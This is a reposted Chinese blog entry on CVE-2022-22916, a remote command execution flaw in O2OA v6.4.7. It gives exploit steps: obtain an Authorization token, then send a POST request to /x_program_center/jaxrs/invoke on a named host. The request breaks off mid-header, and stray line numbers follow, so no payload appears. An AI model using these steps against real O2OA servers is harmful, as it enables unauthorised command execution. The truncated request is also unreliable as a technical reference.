CVE-2022-22916

CVE-2022-22916,O2OA RCE 远程命令执行

O2OA RCE 远程命令执行（CVE-2022-22916）

O2OA是一个基于J2EE分布式架构，集成移动办公、智能办公，支持私有化部署，自适应负载能力的，能够很大程度上节约企业软件开发成本的基于AGPL协议开放源代码的企业信息化系统需求定制开发平台解决方案。 通过 /x_program_center/jaxrs/invoke 发现 O2OA v6.4.7 包含一个远程代码执行 (RCE) 漏洞。

第一步：

登录账号获取Authorization

第二步：添加接口

POST /x_program_center/jaxrs/invoke?v=6.3 HTTP/1.1
Host: 123.58.236.76:33455
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v&#
  

 

  
1
  
2
  
3
  
4
 

文章来源: libai.blog.csdn.net，作者：网络￥安全联盟站，版权归原作者所有，如需转载，请联系作者。

原文链接：libai.blog.csdn.net/article/details/124945795